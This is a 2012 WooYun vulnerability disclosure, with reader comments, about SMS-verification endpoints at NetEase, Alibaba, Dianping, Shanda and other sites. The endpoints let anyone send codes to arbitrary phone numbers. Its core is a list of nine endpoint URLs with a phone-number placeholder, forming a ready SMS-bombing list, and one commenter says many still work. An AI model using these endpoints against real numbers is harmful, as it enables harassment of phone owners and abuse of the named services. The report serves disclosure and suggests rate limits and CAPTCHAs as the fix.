当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010527

漏洞标题:多家网站验证短信随便发,包括网易、盛大、阿里巴巴、完美、点评等

相关厂商:网易

漏洞作者: 老飞侠

提交时间:2012-08-03 16:58

修复时间:2012-08-03 18:38

公开时间:2012-08-03 18:38

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-08-03: 细节已通知厂商并且等待厂商处理中
2012-08-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

不需要是注册用户, 直接利用这些途径,可以对别人的手机号进行骚扰。

详细说明:

将下面的%s替换为手机号就行了,随便发。
就不一个一个的反馈赚rank了,那是不道德的~~
虽然这个是业务设计的需要,但是可能会被用来发骚扰短信。
就是因为某网站的类似漏洞被利用发了200万骚扰短信,于是顺藤摸瓜找到了有类似漏洞的相关网站, 希望能杜绝这种骚扰现象。

http://reg.163.com/services/sendsms?username=%s
http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery16404408283903978138_1329030748736&mobile=%s
http://passport.cnyw.net//ajax.php?action=getverify&mobile=%s
http://passport.wanmei.com/NoteAction.do?method=sendCode&mobile=%s&passwd=
http://club.service.autohome.com.cn/Ashx/CreateMobileCode.ashx?mobile=%s&
http://www.huggieshappyclub.com/Handler/Vcode.ashx?mobile=%s
http://www.dianping.com/ajax/json/account/reg/mobile/send?m=%s
http://www.51taonan.com/?page=join&handler=ajax&action=send_reg_mobile_vcode&page_key=7ef0c64ccfeccd5cdda1306c3b769e1b&mobile_number=%s
http://register.sdo.com/gaea/SendPhoneMsg.ashx?page=REG&mobile=%s

漏洞证明:


修复方案:

发送短信增加验证码,增加发送条数限制、IP限制等。

版权声明:转载请注明来源 老飞侠@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-08-03 18:38

厂商回复:

感谢您对网易的关注,发送短信验证码有次数限制,不会形成短信炸弹。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-08-03 17:06 | also ( 普通白帽子 | Rank:424 漏洞数:52 | 招渗透/php/前端/ios&android安全,广州地...)

    多家网站,你叫人家怎么认领?!

  2. 2012-08-03 17:15 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    如果单纯说填写别人的手机号码,叫骚扰的,你何必你这么麻烦呢,,你这不如直接在网上用他的手机 发求一夜情 骚扰更快,蛋疼的孩子!

  3. 2012-08-03 17:17 | saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)

    加我Q 告诉我下怎么个方法 1759462728

  4. 2012-08-03 17:29 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    @saviour 猜也能猜出 89 不离10吧,当然不是偏低你的意思,,看看国外的黑客氛围 都是挖各种逻辑的漏洞,系统漏洞,我们国内缺少这种氛围呀。整天都看到各种(引用的漏洞)没有实质性突破的东西,比较惋惜呀!!

  5. 2012-08-03 17:35 | saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)

    @king 看你牛B的 把B还给牛吧!

  6. 2012-08-03 17:40 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    @saviour 你误会了,我没有那个意思,只希望大家可以更关注一些不一样的东西,个人感觉没有什么牛逼不牛逼的 只有你知道的多少!

  7. 2012-08-03 17:54 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    一个一个发呀 刷刷rank 呵呵

  8. 2012-08-03 17:54 | xss ( 普通白帽子 | Rank:112 漏洞数:20 | http://localhost/)

    @king 大牛带头突破啊!

  9. 2012-08-03 18:03 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    这样子厂商不能认领得。。。@xsser

  10. 2012-08-03 18:07 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @king 想法是很好,但是事实没那么简单,多数人都喜欢“看”,看别人发的内容,看别人发的问题方向,@king 看了国外黑客的东西后,如果发现有不错的东西和思路可以试试带个头,或者不确定的东西也可以在zone上发一些信息与观点。首先自己要先做到与行动,否则也不好要求别人啊

  11. 2012-08-03 19:40 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @疯狗 赞一个。监督@king

  12. 2012-09-18 17:57 | 孤行灯 ( 路人 | Rank:6 漏洞数:2 | ...)

    恩,好多都还可以用..